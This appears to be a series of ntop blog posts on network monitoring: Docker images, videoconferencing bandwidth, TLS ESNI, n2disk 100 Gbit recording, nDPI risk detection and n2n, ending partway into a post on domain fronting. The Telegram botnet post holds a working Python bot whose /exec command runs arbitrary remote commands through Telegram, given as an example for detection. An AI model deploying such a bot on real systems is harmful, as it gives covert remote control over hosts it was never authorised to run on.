
Using ntop tools (including PF_RING ZC) on Docker


Software containers are an elegant way to deploy software applications. If you are wondering if ntop supports software containers the answer is yes. Whenever new stable versions of packages are built, containers hosted on hub.docker.com are automatically updated.
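For instance, assuming you want the stable ntopng image (the ntop images on hub.docker.com follow the ntop/<tool> naming scheme, e.g. ntop/ntopng), a minimal way to fetch and run it on the host network is:

sudo docker pull ntop/ntopng
sudo docker run --net=host ntop/ntopng -i eth0

Here --net=host gives the container direct visibility of the host interfaces, and -i eth0 is the usual ntopng interface option (adjust the interface name to your system).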

If instead you want to build a custom container, you can use the Docker files we maintain.

Container support is complete, including PF_RING ZC, which can run natively on Docker as described in this document, using a simple command like

sudo docker run -v /dev/hugepages:/dev/hugepages --cap-add ipc_lock ubuntu18 pfcount -i zc:99@0

all of this without, for instance, the complexity of DPDK.

Note that you need one software license per physical host, which gives you the freedom to run multiple application instances on Docker. You can read more here for details.

 

Enjoy!


You’re invited to the future of nDPI: Python, Cybersecurity and Behaviour. May 15th, 4PM CET

Hi all, this is to invite you to an open discussion about nDPI and its future, in particular Python bindings, cybersecurity extensions and behaviour analysis. We will meet at 4PM CET (10AM EST) live on the Internet. This is the URL …

Webinar Invitation: Network Monitoring in Post-Lockdown Days (May 21st and May 26th)


This is to invite our community to a new webinar that will explain how we have enhanced ntopng to take into account the network monitoring challenges posed by the global lockdown. In particular, we will show how ntopng can be integrated with VPN and remote access systems, as well as with commercial firewalls and security devices. The goal is to create a single monitoring console able to offer visibility even when most users are roaming or working remotely. This webinar will be available online (no registration is necessary):

See you soon!

How Lockdown Changed Corporate Internet Connectivity


The global lockdown has forced many people to work remotely: empty offices, with everyone working from home until the emergency is over.

 

In essence, during the lockdown remote workers used very few corporate services via VPN, with relatively light traffic (e.g. accounting), and the heavy videoconferencing traffic did not propagate into company networks, as modern videoconferencing solutions are all cloud-based. Moving to remote working has therefore not put too much pressure on corporate networks, besides the creation of VPN accounts and other limited changes.

Interestingly, the real challenge lies in the reverse transition. As the lockdown is now easing in many regions and some people have started going back to the office, we have decided to evaluate the impact of this change on corporate connectivity. In order to do this we have enhanced nDPI to support all the popular videoconferencing software, including GoToMeeting, Webex, MS Teams, Zoom and Google Meet, so that the bandwidth being used can be measured. In order to compare them, we have run a few tests in the same conditions (two users talking over the Internet with the same PC and camera); the results are listed below (all values are expressed in Mbit/s and measured on one user's side).

                                                            Zoom    Webex   Teams   Skype   Meet
Audio Only                                                  0.2     0.12    0.12    0.15    0.43
Audio+Video (local minified + remote big)                   2.3     0.9     2.1     5       1.9
Audio+Video (local minified + remote application sharing)   0.5     0.4     1.4     2.9     0.96

As you can see, with a pure video call the bandwidth usage is high. That bandwidth is reduced when people share slides or non-moving pictures (in this case people's images are minified and thus lighter in terms of bandwidth usage). Some modern conferencing systems are pretty efficient, others less so, but in general audio calls are not a problem, whereas when video is used (again, by video we mean people's cameras, not screen sharing) bandwidth consumption increases quite a bit. This scenario is not a problem from the corporate standpoint, as videoconferencing systems do not load the corporate Internet link.

Unfortunately, with the end of the lockdown the situation is changing quite a bit, as shown in the picture below: some people go back to the office, while many others keep working remotely. Furthermore, we have noticed that people now use videoconferencing tools more often than before, and often with cameras on, which makes the overall experience more immersive and human-friendly. In essence, the phone is no longer the main medium, as it has been replaced by HD desktop conferencing tools (even the meeting-room conferencing system is used very seldom, as people prefer to stay at their desks when it is not too noisy, thus increasing the number of simultaneous conferences, previously limited by the number of available conference rooms). The new scenario is depicted below.

This has created a few problems, as the corporate Internet link is under pressure, flooded by many simultaneous conferences no longer absorbed by the cloud. This problem can be addressed either by preventing people from using their cameras (only screen sharing is allowed) or by increasing the corporate bandwidth, with the extra costs involved.

If you are wondering how the bandwidth is used, thanks to nDPI and ntopng you can now visualize the traffic with the pie charts you are already familiar with, and create long-term timeseries to understand how the traffic has changed with respect to the pre-lockdown days.

From the network protocol standpoint, some videoconferencing protocols are pretty challenging. While Zoom and Webex are somehow "simple" to track, others such as Microsoft Teams are much more challenging. This is because Teams is a mix of various underlying network protocols, ranging from Microsoft 365 (for the calendar, for instance) to Skype for audio and video communications: Microsoft acquired Skype some years ago and has apparently started to adopt Skype inside Teams. So the big challenge has been to mark Skype as Teams when Teams is in use, and leave it as Skype when the consumer Skype app or Skype for Business is used. That said, thanks to the latest nDPI extensions, all the leading videoconferencing protocols are now supported and marked properly so that you can enjoy timely protocol reports. Just make sure to update your ntop tools to the latest (nightly) version where all these changes have been incorporated.
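If you want to check what nDPI reports for your own conferencing traffic, the ndpiReader utility bundled with nDPI can be pointed at a live interface or at a capture file (the pcap name below is just a placeholder):

ndpiReader -i meeting.pcap -v 1

This prints the per-flow application protocol together with the bytes exchanged, which is the kind of data we used above to compare the various tools.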

Enjoy!

 

Why Behaviour Traffic Analysis is Good (was Encrypting TLS 1.3 Traffic)


In the latest nDPI meetup we discussed future directions, including extending the current encrypted traffic analysis features. Currently nDPI supports both fingerprint- and behaviour-based encrypted traffic analysis techniques to provide TLS traffic visibility. At ntop we have never much liked fingerprinting techniques such as JA3, used by many popular IDSs and security tools, simply because they often lead to false positives, making them a "nice to have" feature but nothing more than that.

The IETF is currently designing a new TLS 1.3 extension named ECHO (Encrypted Client Hello). In TLS 1.3 the only initial handshake message in cleartext is the Client Hello: it is quite important as it contains, in cleartext, the SNI (Server Name Indication), which is basically the name of the server the client is contacting. ECHO tries to fix this data disclosure by sending this information encrypted, so that a network monitoring tool will be unable to inspect traffic and see whether we are accessing maps.google.com instead of gmail.com. Although ECHO works with cleartext DNS, the idea of Firefox (to date the only browser supporting it) is to avoid any metadata leak by forcing the use of DoH: this prevents monitoring tools from seeing what site has been visited by looking at the DNS traffic. Note that the TLS client encrypts the data in ECHO using a public key that is published in the DNS of the contacted host (it is stored in a TXT record named _esni.domainname). Example:

;; ANSWER SECTION:
_esni.hackthetower.it.	1800	IN	TXT	"/wHuOSrNACQAHQAgKO0MmMYpnkF3QL3YhV0AiwWoqqaTEHp7/lKIzBLLeS4AAhMBAQQAAAAAXsvrgAAAAABe09SAAAA="
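The record above can be retrieved with any DNS client, for instance:

dig +short TXT _esni.hackthetower.it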

In nDPI we support detection of encrypted SNI (ESNI).

TCP 192.168.1.12:49886 <-> 104.27.129.77:443 [proto: 91.220/TLS.Cloudflare][cat: Web/5][197 pkts/17789 bytes <-> 211 pkts/175194 bytes][Goodput ratio: 40/93][6.64 sec][ALPN: h2;http/1.1][TLS Supported Versions: TLSv1.3;TLSv1.2;TLSv1.1;TLSv1][bytes ratio: -0.816 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 28/26 1000/1000 139/134][Pkt Len c2s/s2c min/avg/max/stddev: 54/60 90/830 770/1506 77/677][TLSv1.3][JA3C: e5ef852e686954ba9fe060fbfa881e15][JA3S: eb1d94daa7e0344597e756a1fb6e7054][ESNI: 9624CB3C4E230827F78CF5BF640D22DEA33FCC598EA6A32D939905586FBE997B9E68661F8956D4893072E19DE24CD1FB88A9F71FC4CC01BAB5C914FDF96A647D671B5E89859BAEEAB122218688496DF4DF0C328C3D5F940B109CEB2A2743D5CBE3594288A229B8C7E2F88303E3FE1A26A89E5001F2BD936890FEF78F06E05ECC063A68BDB8C18DFAC114CF1FECDB8BE1FC2FEECB2315D27998D682B129FD1E3EB5D7985DCBDC452A1082CCC038E0BF69570FEFAC6BC6FB951F89B6792CADA76403C02CEB5DCE1CE6EDDD16D5F7FB6B85D2B92485448DE0088E421E83F1E28B267FBE3B59AE0496FB845213C271D4C5AC5E9E7E5F6A3072445307FCCEB7306710459991C40CC4DC1FC325154C7974DD780371397805456A19AE23EE88475C1DF07697B666][ESNI Cipher: TLS_AES_128_GCM_SHA256][Cipher: TLS_AES_128_GCM_SHA256]

The ESNI itself is not very useful to an observer: ancillary data such as the record keys (used for encryption and placed in the DNS) are often updated every hour, making the record digest useless for identifying the accessed web site (i.e. it cannot be used as a fingerprint for the contacted site).

You might ask yourself: is this the end of visibility and of nDPI? While ECHO definitely has implications for traffic visibility, this is not the case, and the reasons are manifold:

  • ECHO will prevent TLS fingerprints from working, whereas behaviour analysis will still work. This is good news for nDPI, as we have been working for a few months on enhancing behaviour traffic analysis, and advising against using fingerprints as they might lead to false positives.
  • Operators and security teams can decide to block TLS traffic with these extensions as they prevent them from enforcing traffic policies.
  • ECHO is still in draft, so it’s not clear if it will be standardised in the current form.
  • While DoH is not mandatory for ECHO, blocking non-operator-provided DoH servers (which nDPI can detect) can mitigate the loss of metadata. This means that traffic monitoring and security applications can still get enough hints from the metadata leaking out of DNS queries.
  • Visibility of CDN-based traffic will be partially affected, unless the IP address/port discloses the nature of the traffic, as is the case with most large companies (e.g. https://docs.microsoft.com/en-us/office365/enterprise/urls-and-ip-address-ranges is used inside nDPI).
  • Malware will probably not use ECHO for a long time (today most malware uses TLS 1.1 when not using plain HTTP). However, just to repeat it one more time, we believe that nDPI should detect malware using behaviour analysis techniques rather than fingerprints.
  • To date the only browser supporting ESNI is Firefox with DoH enabled (https://encryptedsni.com).

In summary, expect TLS to become completely encrypted in the next few years: this is good news for the Internet, but not so good for monitoring and security tools. nDPI already supports ESNI, and we will do our best to keep it updated with the latest TLS 1.3 extensions as they are standardised. ECHO is not the end of TLS fingerprinting, but it can definitely be yet another good reason to look at TLS behaviour instead of limiting the analysis to fingerprints. Stay tuned for more news about nDPI and encrypted traffic analysis.

Enjoy!

ntop Tools Taxonomy


As people are sometimes confused about the various options that the ntop tools offer, this post is an attempt to clarify them in a single page.

Use Case | Product
Collect flows (sFlow and/or NetFlow) and dump them to disk or send them to a remote collector | nProbe (any version). Better to use nProbe Pro if you have proprietary flows. Check the nProbe working modes.
Convert packets into flows | nProbe if you have <= 10 Gbit traffic, or nProbe Cento at 10+ Gbit. Check the nProbe working modes.
Both collect and visualize flows on a web GUI | Use ntopng for visualisation and nProbe for flow collection. Check how to configure nProbe with ntopng.
Analyse network packets and create a web report | Use ntopng if you have a few Gbits of traffic. With more traffic, use nProbe or nProbe Cento to convert packets into flows and use ntopng to collect them.
Dump traffic to disk | n2disk. Choose the version based on the network speed you are monitoring (1, 5, and 10+ Gbit). It is possible to integrate it with ntopng.
Mitigate network traffic attacks discarding bad traffic | nScrub. Choose the version based on the network speed and the number of hosts to protect.
Process traffic (<= 1 Gbit) | PF_RING community.
Process traffic (> 1 Gbit) | PF_RING ZC. Note that ntopng, nProbe and the other products need a PF_RING ZC license when operating at network speeds of 1 Gbit+.
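As an example of the "collect and visualize flows" row above, this is a minimal sketch of how nProbe and ntopng are typically paired over ZMQ (interface name and address are placeholders; see the official documentation for the full options):

# nProbe converts packets seen on eth1 into flows and exports them via ZMQ
nprobe -i eth1 --zmq "tcp://127.0.0.1:5556"

# ntopng collects those flows and displays them in its web GUI
ntopng -i tcp://127.0.0.1:5556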

Enjoy!

Howto Identify and Block Telegram-based Botnets


Botnets are a popular way to run malware on a network using the command-and-control paradigm. Popular protocols used by botnets include IRC and HTTP. Most IDSs can detect bots as long as they can inspect the network traffic. This leaves network administrators blind when bots move to encrypted and cloud-based protocols (i.e. ones that you cannot block with a simple IP-based ACL). The popular Telegram messaging system allows people to create a bot in minutes, as shown in the code excerpt below.

 

import subprocess
import time

# the bot below uses the telepot Telegram library
from telepot import Bot, glance
from telepot.loop import MessageLoop

token = 'REPLACE_WITH_BOT_TOKEN'  # token obtained from Telegram's BotFather

bot = Bot(token)


def run():
    """ Runs the function used to start the bot.
    """

    MessageLoop(bot,
                { 'chat': on_chat_message }
                ).run_as_thread()

    print('Listening ...')

    while 1:
        time.sleep(10)

####################################################################

def help(bot, chat_id):
    bot.sendMessage(chat_id, 'Available commands:')
    bot.sendMessage(chat_id, '/exec    Execute remote command')

####################################################################

def run_command(command):
    p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return p.stdout.read().decode('utf-8')

####################################################################

def on_chat_message(msg):
    """ Manages the predefined commands of the telegram bot.

    :param msg: message received from telegram.
    """

    #print(msg)
    content_type, chat_type, chat_id = glance(msg)

    #
    # Check if the content_type of the message is a text
    if content_type == 'text':
        txt = msg['text'].lower()

        #
        # Switch construct to manage the various commands
        if txt.startswith("/exec"):
            cmd = txt[6:]
            bot.sendMessage(chat_id, 'Executing command ['+cmd+']...')
            bot.sendMessage(chat_id, run_command(cmd.split(' ')))
        else:
            help(bot, chat_id)

run()

As you can see you can start the bot on a remote system and execute arbitrary commands.

Suppose now that one of your coworkers leaves this simple bot running inside your network. The firewall will see this traffic as TLS-like traffic on port 443 and let it go through.

As you can see from the above image, this Telegram traffic looks like TLS, but it is not TLS where you can leverage detection on certificates, JA3, etc. You can imagine the consequences of having these simple tools running on a network. In essence your network is exposed, and firewalls and popular non-DPI-based IDSs such as Suricata or Zeek cannot do much against this.

Fortunately nDPI can detect it:

Detected protocols:
    Telegram             packets: 156           bytes: 44034         flows: 2            


Protocol statistics:
    Acceptable                   44034 bytes

    1	TCP 192.168.1.110:52671 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][76 pkts/9307 bytes <-> 74 pkts/33973 bytes][Goodput ratio: 46/86][3.75 sec][bytes ratio: -0.570 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 58/59 1817/1852 264/272][Pkt Len c2s/s2c min/avg/max/stddev: 66/70 122/459 846/1294 133/446]
    2	TCP 192.168.1.110:52672 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][4 pkts/445 bytes <-> 2 pkts/309 bytes][Goodput ratio: 38/55][0.07 sec][bytes ratio: 0.180 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/36 23/36 35/36 16/0][Pkt Len c2s/s2c min/avg/max/stddev: 66/74 111/154 235/235 72/80]
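The report above is the kind of output printed by the ndpiReader test application bundled with nDPI; assuming the bot traffic has been saved to a capture file, it can be reproduced with something like:

ndpiReader -i telegram_bot.pcap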

So all ntop tools (e.g. ntopng, nProbe…) can handle that. Now that you have realised that you are no longer blind, you have two options on the table:

  • Visibility (for instance with ntopng)
  • Block this traffic using ntopng Edge.

In ntopng you have the ability to specify what protocols a certain device can run.

So you can generate an alert in case a critical host (e.g. a server) runs unwanted protocols, including all those supported by nDPI, hence including Telegram.

If you want to see more security-oriented alerts, you can customise the user scripts and enable those behavioural checks you are interested in.

We hope this can help to keep your network safe, and network administrators no longer blind.

Enjoy!

 

Howto Build a 100 Gbit (Drop-Free) Continuous Packet Recorder using n2disk [Part 3]


In the first post of this series (part 1) we described how to build a 2×10 Gbit continuous packet recorder using n2disk and PF_RING; in the second post (part 2) we described what hardware is required to scale from 10 Gbit to 100 Gbit. One more year has passed now and we have gained more experience with 100 Gbit recording, so it is time to refresh the previous posts and share more information about the new capture and storage technologies and configurations needed to build a recorder able to dump 100+ Gbit line-rate, small-packet, sustained traffic.

For those reading about this topic for the first time, a continuous packet recorder is a device that captures raw traffic to disk continuously, similar to a CCTV camera, providing a window into network history. This allows you, whenever a network event happens, to go back in time and analyse traffic down to the raw packet as it appeared on the wire (including headers and payload) to find out exactly what caused a specific issue.

With n2disk, which is part of the ntop suite, it is possible to build such a device and dump traffic in the standard PCAP format. Furthermore, by leveraging PF_RING acceleration, n2disk is able to capture, index and dump traffic from 1/10/100 Gbit links with no packet loss in any traffic condition. This year we released a new n2disk stable version, 3.4, which besides adding interesting new features (including the ability to filter traffic based on the L7 application protocol) introduced major performance optimizations when running on top of FPGA-based NICs.

In this post we will focus on 100 Gbit recording, describing a hardware and software configuration that our users are successfully using in production environments.

Hardware Specs

Network Card

As already discussed in the previous post n2disk is able to capture traffic from many adapters thanks to the abstraction layer provided by the PF_RING modules. Based on the speed and features we need (and our budget) we can decide to go for a commodity adapter (e.g. Intel) or a specialised FPGA adapter (e.g. Napatech, Silicom/Fiberblaze).

There are a few commodity adapters with 100 Gbit connectivity on the market; however, they are usually not able to cope with full 100 Gbit throughput in every traffic condition (e.g. small packets), even using accelerated drivers, when it comes to dumping traffic to disk. The main reason is that in this case we cannot use technologies like RSS to spread the load across multiple streams, as this would shuffle packets (coming from different streams) onto disk, and we need to preserve packet order to provide evidence of a network event. Please note that using multiple streams is still an option if we have a way of sorting packets (e.g. high-precision hardware timestamps), which is usually not the case with commodity adapters.

FPGA adapters provide support for moving packets in big chunks, delivering high throughput to applications like n2disk without the need to use multiple streams in most cases (in our experience n2disk is able to handle up to ~50 Gbps with a single stream). In this post we will use the Napatech NT200A02 adapter as the reference for the configuration; however, other options such as Silicom/Fiberblaze adapters are also supported.

Storage

When it comes to selecting fast storage, the word "RAID" immediately jumps to mind. A good RAID controller (e.g. with 2 GB of onboard buffer) with a few disks in a RAID 0 configuration can increase the I/O throughput up to 40+ Gbps. However, this is not enough to handle 100 Gbps. If we need a long data retention time, and rack space is not a problem, we can probably use a few RAID controllers and many HDDs or SSDs to distribute the load and reach the desired throughput.

A better option could be using NVMe disks. These disks are fast SSDs directly connected to the PCIe bus. Since they are fast, they do not even require a RAID controller (actually, a standard SATA/SAS controller cannot drive them), and it is possible to leverage the multithreaded dump capability of n2disk to write directly to many of them in parallel and dramatically increase the dump throughput.

The throughput we’ve been able to achieve with n2disk using Intel NVMe disks from the P4500/P4600 series is ~20 Gbps per disk. This means that 8 disks are enough for recording traffic at 100 Gbps. Please make sure that you select write-intensive disks that guarantee enough endurance time.

CPU

FPGA adapters are able to aggregate traffic in hardware and distribute the load across multiple streams. As said before, n2disk is able to handle up to ~50 Gbps with a single capture thread/core and a single data stream. If we use a 3+ GHz Xeon Gold CPU, at 50 Gbps n2disk requires 3-4 cores for indexing traffic. One more core is required for the threads dumping traffic to disk, for a total of 6 cores.

If we want to handle 100 Gbps of traffic, we should use 2 streams, with one n2disk instance each; thus a 3+ GHz Xeon Gold with at least 12 cores is required. An Intel Xeon Gold 6246 is an example of the minimum requirement at this speed. If you go for a NUMA system (multiple CPUs), please pay attention to the CPU affinity, as already discussed in the previous posts! Please also make sure you configure the system with enough memory modules to use all memory channels (check the CPU specs for this) and with the maximum supported frequency.

Software Configuration

Data Stream Configuration

In order to run n2disk on Napatech or other FPGAs with the best performance, the adapter needs to be properly configured. Support for chunk mode, the PCAP format and nanosecond timestamps needs to be enabled in the configuration file under /opt/napatech3/config/ntservice.ini, as described in the n2disk user's guide. Please find below the parameters that you usually need to change:

[System]
TimestampFormat = PCAP_NS
[Adapter0]
HostBufferSegmentSizeRx = 4
HostBuffersRx = [4,128,0]
MaxFrameSize = 1518
PacketDescriptor = PCAP

If a single data stream is enough, no additional configuration is required, as it is possible to capture directly from an interface (e.g. nt:0 for port 0). If a single data stream is not enough because the traffic throughput exceeds 50 Gbps, multiple streams need to be configured using the ntpl tool. In the example below, traffic is load-balanced across two streams using a 5-tuple hash function; each stream can be selected by capturing from nt:stream<id> (e.g. nt:stream0 for stream 0).

/opt/napatech3/bin/ntpl -e "Delete=All"
/opt/napatech3/bin/ntpl -e "HashMode = Hash5TupleSorted"
/opt/napatech3/bin/ntpl -e "Setup[NUMANode=0]=Streamid==(0..1)"
/opt/napatech3/bin/ntpl -e "Assign[streamid=(0..1)] = All"

n2disk Configuration

A good n2disk setup is also really important in order to achieve the best dump performance. The tuning section of the n2disk user’s guide contains basic guidelines for properly configuring dump settings, CPU core affinity, indexing, etc.

In this example we are capturing 100 Gbps of traffic divided into two streams, by means of two n2disk instances, each of which should handle a maximum throughput of 50 Gbps. Traffic is stored in PCAP files across multiple NVMe disks in round-robin. As we have seen before, each NVMe disk has a maximum sustained I/O throughput of 20 Gbps, thus 4 disks will be used for each n2disk instance.

Please note that dumped traffic can later be extracted seamlessly from all NVMe disks by selecting all the timelines generated by the n2disk instances as data sources in the npcapextract extraction tool. Please find below the configuration file for the first n2disk instance, with comments describing what each option is supposed to do.

# Capture interface
-i=nt:stream0
# Disk space limit
--disk-limit=80%
# Storages (NVMe disks 1, 2, 3, 4)
-o=/storage1
-o=/storage2
-o=/storage3
-o=/storage4
# Max PCAP file size
-p=2048
# In-memory buffer size
-b=16384
# Chunk size
-C=16384
# Index and timeline
-A=/storage1
-I
-Z
# Capture thread core affinity
-c=0
# Writer thread core affinity
-w=22,22,22,22
# Indexing threads core affinity
-z=4,6,8,10

Please find below the configuration file for the second n2disk instance, which is similar to the previous one. It is important here to pay attention to the CPU affinity, to avoid using the same cores twice (including logical cores when hyperthreading is enabled), which would affect performance.

-i=nt:stream1
--disk-limit=80%
-o=/storage5
-o=/storage6
-o=/storage7
-o=/storage8
-p=2048
-b=16384
-C=16384
-A=/storage5
-I
-Z
-c=2
-w=46,46,46,46
-z=12,14,16,18

At this point we are ready to start the two n2disk instances. The chart below shows the CPU core utilisation while capturing, indexing and dumping sustained 100 Gbps traffic (64-byte packets) continuously.

Now you have all the ingredients to build your 100 Gbps traffic recorder.
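Once traffic has been recorded, extraction works as usual. Below is a minimal sketch that pulls five minutes of traffic for one host out of the timeline of the first instance (times, paths and filter are placeholders):

npcapextract -t /storage1 -b "2020-01-01 10:00:00" -e "2020-01-01 10:05:00" -o /tmp/slice.pcap -f "host 192.168.1.10"

Run the same extraction against the second instance's timeline (or select both timelines as data sources, as mentioned above) to cover the whole link.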

Enjoy!


Introducing nDPI Risk Analysis for (Cybersecurity) Network Traffic Analysis (was Ripple20)


Earlier last month Ripple20 became popular, as it listed some vulnerabilities found in a custom IP stack used by many IoT devices. Despite the hype around Ripple20, in essence the tool used to fingerprint vulnerable devices sends either malformed or valid packets (with some values in the allowed range, albeit deprecated or obsolete) that are easy to catch (see the Suricata and Zeek rules for detection). In essence, IDS rules/scripts check whether packets sent on the wire are valid or whether they contain the unexpected values used by Ripple20. Note that these rules are NOT checking packets in general (for instance checking whether the TLS header is valid, or whether ICMP packets contain valid, non-deprecated type/code values); they are designed to spot only Ripple20, so if a future Ripple21 uses the same method but a different value, we will be back to square one and a new set of rules/scripts will need to be defined. This is how signature-based systems work, and as you can see they are easy to circumvent by making small changes to network traffic, not to mention that constantly adding new rules/scripts will make these systems slow.

In order to have a more general solution to this problem, we have decided to introduce in nDPI (and thus in all applications that use it) a new type of analysis, which we have named "risk factor", that analyses the traffic and produces a bitmap of the issues found in it. This is of course not based on signatures/scripts, so that we are prepared to catch Ripple21 if/when it is disclosed. In essence, when dissecting traffic nDPI will also evaluate a set of risks and report them to the application using it, in addition to the application protocol. This mechanism is extensible and we are constantly adding new values to make it more pervasive. Applications using nDPI can use the risk factor to block traffic or issue an alert, without having to implement complex detection methods, as nDPI has already done everything. As of today, nDPI is able to detect the following issues:

  • XSS (Cross Site Scripting)
  • SQL Injection
  • Arbitrary Code Injection/Execution
  • Binary/.exe application transfer (e.g. in HTTP)
  • Known protocol on non standard port
  • TLS self-signed certificate
  • TLS obsolete version
  • TLS weak cipher
  • TLS certificate expired
  • TLS certificate mismatch
  • HTTP suspicious user-agent
  • HTTP numeric IP host contacted
  • HTTP suspicious URL
  • HTTP suspicious protocol header
  • TLS connections not carrying HTTPS (e.g. a VPN over TLS)
  • Suspicious DGA domain contacted
  • Malformed packet (Ripple20 is detected here)
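From the application standpoint, consuming the risk factor is just a matter of testing bits in the bitmap that nDPI attaches to each flow. Below is a minimal sketch in C: the risk names come from the nDPI 3.x headers (check ndpi_typedefs.h of your version for the exact enum), and the surrounding flow-handling code is assumed:

#include <stdio.h>
#include "ndpi_api.h"   /* nDPI public API */

/* Called once nDPI has classified a flow: flow->risk is a 64-bit
 * bitmap with one bit per detected issue (bit index = risk enum value). */
static void report_risks(struct ndpi_flow_struct *flow) {
  ndpi_risk risk = flow->risk;

  if(risk & (1ULL << NDPI_MALFORMED_PACKET))
    printf("Malformed packet (this is where Ripple20-style probes end up)\n");

  if(risk & (1ULL << NDPI_BINARY_APPLICATION_TRANSFER))
    printf("Binary/.exe transfer (e.g. an .exe disguised as a PNG)\n");

  if(risk & (1ULL << NDPI_SUSPICIOUS_DGA_DOMAIN))
    printf("Contacted domain name looks DGA-generated\n");
}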

If your nDPI-based application can assign a score to the above risks, you have already spotted most of the problems that IDSs detect, without the headache of constantly updating rules/scripts. For instance, in this pcap a malware transfers a binary application (.exe) as a PNG file, in order to evade security policies.

As you can see in the above picture, ntopng (which uses nDPI and thus benefits from this traffic analysis without having to implement anything beyond interpreting the risk factor reported by nDPI) reports this issue and triggers an alert. Simple and effective, isn't it?

Enjoy!

 

July 16th and 24th: Community Meeting and Webinar Announcement


This month we’ll meet our community in two different events:

  • When: Thursday, July 16th, 16:00 CET / 10 AM EST
    What: Live community meeting
    Where: Discord. You can read here how to join the public ntop voice channel for this live event.
    Abstract: Recently we have started to use Discord as a platform for interacting with our community, in addition to Telegram. The advantage of Discord is the ability to combine text/voice/screen sharing, so we want to run an experiment: meet our users, discuss with them and provide support. The idea is to have an informal discussion with our users (no webinar format).
  • When: Friday, July 24th, 16:00 CET / 10 AM EST
    Webinar Title: How to Write an ntopng Plugin for Flow Risks Analysis
    Where: Microsoft Teams
    Abstract: Recently, we have introduced the "Risk Factor" in nDPI, a new way to analyse traffic and simultaneously detect risks associated with each flow. Risks include, but are not limited to, Cross-Site Scripting (XSS), SQL injection (SQLi), Remote Code Execution (RCE) and TLS issues. In this workshop, we will see how to create an ntopng Lua plugin which leverages the nDPI "Risk Factor" to generate alerts and opportunely update the 'score' indicator of compromise for hosts and flows. The intended audience is practitioners with minimal scripting skills. By the end of the workshop, participants will have the skills and understanding necessary to extend ntopng with custom plugins.

Mice and Elephants: HowTo Detect and Monitor Periodic Traffic


Most people are used to "top X" rankings: top senders, top receivers, top protocols. In essence they are looking for elephants. While this is a good practice, mice are also very interesting, as they can often be hidden in the noise. In cybersecurity, noise is very good for attackers, who often try to hide in it in order to escape security. Much malware is programmed in a loop fashion: do a), do b), do c), then go back to a), in an infinite loop. In essence this is a periodic activity that is worth investigating (see similar studies on this subject [1], [2], [3], [4]), but the standard top X analysis tools fall short in detecting it, so we need something more sophisticated. For this reason we have implemented a new feature in ntopng that can detect this behaviour, among other things.

In order to enable this feature, you need a recent version of ntopng (this feature is present only in the pro/enterprise edition dev builds and will be integrated in the next stable release), and you need to enable the corresponding preference.

Then you need to restart ntopng and wait until some periodic behaviour is detected.

How Periodic Traffic Detection Works

Traffic is considered to be periodic if it repeats regularly over time with a given frequency. Periodicity is not computed at the flow level, as ephemeral ports would jeopardise the analysis, but on a triplet <L4 protocol, IP source, IP destination/SNI>. The SNI in particular is very relevant for detecting periodicity in cloud services, where the same SNI is served by different server IP addresses. In order to avoid generating too much noise, multicast and broadcast destination IP addresses are ignored, as in LANs there are many periodic services that might confuse network analysts. ntopng accounts triplets and determines the frequency based on the flow creation time. Some flows can have a frequency of one minute, others of one hour: ntopng detects this automatically, without people having to configure anything. Small frequency drifts are handled automatically and accounted for by ntopng.

A triplet is marked as periodic with a given frequency if ntopng has been able to observe it at least 3 times with a stable frequency (i.e. if the frequency is one hour, you need to wait about 3 hours before ntopng reports anything). In order to limit memory usage, ntopng accounts for periodicities up to one hour, but future versions may raise this limit, which exists only to bound memory usage and is not an algorithmic limitation. If ntopng detects periodic traffic, this information is reported in the user interface under the interface page.

As you can see the application protocol, ports and frequency are reported.

Using Periodicity to Detect Threats

Now that you know more about periodic traffic, you might wonder if this is just a curiosity or more than that. Have a look at the two images below.

Let's analyse the SSH traffic to see what is happening. As you can see, ntopng has detected periodic communications that are pretty suspicious, in particular if you look at the SSH ports, some of which are not standard. They can hide monitoring applications or some other kind of nasty behaviour.

Interesting information can also come from Unknown periodic traffic, which is very suspicious (you could do the same by looking at other protocols, such as IRC, that are often used by malware).

We hope you can find interesting insights on your network using this new feature. We plan to extend it with alerts, which can help network analysts do in-depth analysis without having to dive into periodic data, which can be pretty large for a big network.

Enjoy!

 

Introducing n2n 2.8: Modern Crypto and Data Compression


This is to announce the release of n2n 2.8 stable. This release brings significant new features to n2n's crypto world and offers some compression opportunities. Overall n2n performance has been greatly enhanced, bandwidth usage has been reduced thanks to data compression, and security is brought to the state of the art with the new crypto options. The added support for routing table manipulation might increase comfort. Besides further honing existing features, this release addresses some bugs.

New Features

  • Two lightweight stream ciphers: ChaCha20 (optional, through OpenSSL) & SPECK (integrated)
  • Full Header Encryption (including packet checksumming as well as replay protection)
  • A callback interface to better integrate n2n in third party software (you can still use it stand-alone)
  • Enable the integrated LZO1x compression
  • Add optional ZSTD compression (through zstdlib)
  • Support for changing system routes at program start and end
  • User and group id parameter for supernode
  • Application of cryptography in n2n is separately documented
  • Add a new pseudo random number generator with higher periodicity seeded with more entropy if available
  • Android users can use hin2n to run n2n on their mobile phones.

Improvements

  • Have AES and ChaCha20 use OpenSSL’s evp_* interface to make better use of available hardware acceleration
  • Fix invalid sendto when supernode name resolution fails
  • Update to supernode’s purge logic
  • Extended management supernode’s port output
  • Fix read tap device failed when OS wakes up from sleep
  • Free choice of supernode’s management UDP port (for multiple supernodes on one machine)
  • Additional trace messages to better indicate established connections and connection type
  • Fix edge’s register-to-supernode loop
  • Remove redundant code
  • Restructure the code in directories
  • Clean-up platform-dependant code
  • Compile fixes for Windows
  • Fix build warnings
  • …and many more under-the-hood fixes and tunings

Now we can plan for v3 on a building block that is rock solid and efficient. Many thanks to Logan oos Even who has contributed to many of the 2.8 features.

Enjoy!

How to Detect Domain Hiding (a.k.a. Domain Fronting)


Domain fronting is a technique that was used in the 2010s by mobile apps to attempt to bypass censorship. The technique relies on a "front" legitimate domain that basically acts as a pivot for the forbidden domain. In essence, an attacker performs an HTTPS connection where the legitimate domain name is used in the DNS (to resolve the domain name) and in the TLS SNI, whereas inside the HTTP connection the "Host" HTTP header specifies the forbidden domain.

